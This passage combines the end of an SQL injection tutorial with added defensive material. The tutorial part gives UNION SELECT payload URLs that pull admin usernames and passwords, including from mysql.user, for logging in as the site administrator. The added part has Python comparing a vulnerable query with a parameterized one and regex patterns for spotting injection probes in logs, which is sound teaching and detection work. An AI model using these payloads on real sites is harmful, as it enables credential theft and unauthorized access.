Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc.
It would look like this:
http://www.example.com/news.php?id=1 union all select 1,2,3 from admin/* (if we see number 3 on the screen like before, that's very good)
So we know that the table admin exists ..
So now we need to check column names, let's do it.
http://www.example.com/news.php?id=1 union all select 1,username,3 from admin/* (if you get an error, then you need to try another column name)
We will get the username displayed on screen; an example would be admin, or other etc..
Now we need to check whether the column password exists.
http://www.example.com/news.php?id=1 union all select 1,password,3 from admin/* (if you get an error, then try another column name)
Now we see the password on the screen as a hash or in plain-text; it depends on how the database is set up xD
The hash could be an md5 hash, a mysql hash, etc…
Now people, we must complete the query so it looks very good.
To do that, we can use the concat() function (it joins strings)
Example:
http://www.example.com/news.php?id=1 union all select 1,concat(username,0x3a,password),3 from admin/*
Note: 0x3a is the hex value for the colon character.
There is another way of doing that, e.g. char(58), the decimal ASCII value for the colon.
http://www.example.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*
Now we will get username:password displayed on screen, e.g. admin:hash or admin:password
When you have this, you can log in as the website admin or website Super Administrator.
If you can't guess the table name right, you can always try mysql.user (default)
It has user and password columns, so an example would be like this:
http://www.example.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
The End.
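Both SQL injection tutorials above (the one against news.php?id=5 and this one) depend on a single coding error: the id parameter is pasted into the SQL text, so a stray quote breaks the syntax, ORDER BY n leaks the column count and UNION appends rows from another table. The example below is added for this page and is not code from either post: it runs the vulnerable lookup and its hardened replacement (type validation plus parameter binding) against an in-memory SQLite database, and adds a small log check that flags the probe requests these tutorials generate. The tables, rows and log lines are constructed, and the log format is assumed to be Apache/nginx combined format.

```python
"""Vulnerable vs. parameterized lookup, plus detection of the probe requests in logs.
Added example: schema, rows and log lines are constructed."""
import re
import sqlite3
from typing import List, Tuple
from urllib.parse import unquote_plus


def make_db() -> sqlite3.Connection:
    """Constructed schema mirroring the tutorials: a news table and an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news VALUES (5, 'Hello', 'First post');
        INSERT INTO admin VALUES (1, 'admin', 'HASH-PLACEHOLDER');
    """)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> List[Tuple]:
    """The news.php?id= pattern: the request parameter becomes part of the SQL text."""
    return conn.execute("SELECT title, body FROM news WHERE id = " + raw_id).fetchall()


def query_errors(conn: sqlite3.Connection, raw_id: str) -> bool:
    """True when the vulnerable query fails to parse, the signal the tutorials look for."""
    try:
        vulnerable_lookup(conn, raw_id)
        return False
    except sqlite3.OperationalError:
        return True


def safe_lookup(conn: sqlite3.Connection, raw_id: str) -> List[Tuple]:
    """Hardened form: validate the type, then bind the value; the SQL text never changes."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return []          # not an id at all; a web app would answer 400 here
    return conn.execute("SELECT title, body FROM news WHERE id = ?", (article_id,)).fetchall()


# Signatures of the probes shown in the tutorials, matched against the decoded request target
PROBE_PATTERNS = [
    re.compile(r"\border\s+by\s+\d+", re.I),
    re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    re.compile(r"'\s*(/\*|--|$)"),            # quote at the end or before a comment
]
_REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')


def flag_sqli_probes(log_lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, decoded_target, pattern) for requests matching a probe signature."""
    hits = []
    for line in log_lines:
        m = _REQ.match(line)
        if not m:
            continue
        ip, target = m.group(1), unquote_plus(m.group(2))
        for pat in PROBE_PATTERNS:
            if pat.search(target):
                hits.append((ip, target, pat.pattern))
                break
    return hits


# Constructed access-log lines: one normal request, three probes, one benign apostrophe
SAMPLE_LOG = """\
203.0.113.7 - - [25/Jun/2008:10:00:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 512
203.0.113.7 - - [25/Jun/2008:10:00:02 +0000] "GET /news.php?id=5' HTTP/1.1" 500 88
203.0.113.7 - - [25/Jun/2008:10:00:03 +0000] "GET /news.php?id=5+order+by+4/* HTTP/1.1" 500 88
203.0.113.7 - - [25/Jun/2008:10:00:04 +0000] "GET /news.php?id=5+union+all+select+1,@@version,3/* HTTP/1.1" 200 600
198.51.100.2 - - [25/Jun/2008:10:00:05 +0000] "GET /news.php?id=7&q=it's HTTP/1.1" 200 512
""".splitlines()

if __name__ == "__main__":
    db = make_db()
    print("syntax error on quote:", query_errors(db, "5'"))
    print("vulnerable:", vulnerable_lookup(db, "5 union all select username, password from admin"))
    print("safe:", safe_lookup(db, "5 union all select username, password from admin"))
    for hit in flag_sqli_probes(SAMPLE_LOG):
        print("probe:", hit)
```

The detector's quote rule deliberately requires the quote to be at the end of the target or followed by a comment opener, so ordinary apostrophes in search terms do not fire. A sequence of a 500 on the quote probe followed by ORDER BY and UNION requests from one client within seconds is the signature to alert on; the fix on the application side is the bound parameter, which makes every one of those requests return nothing.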

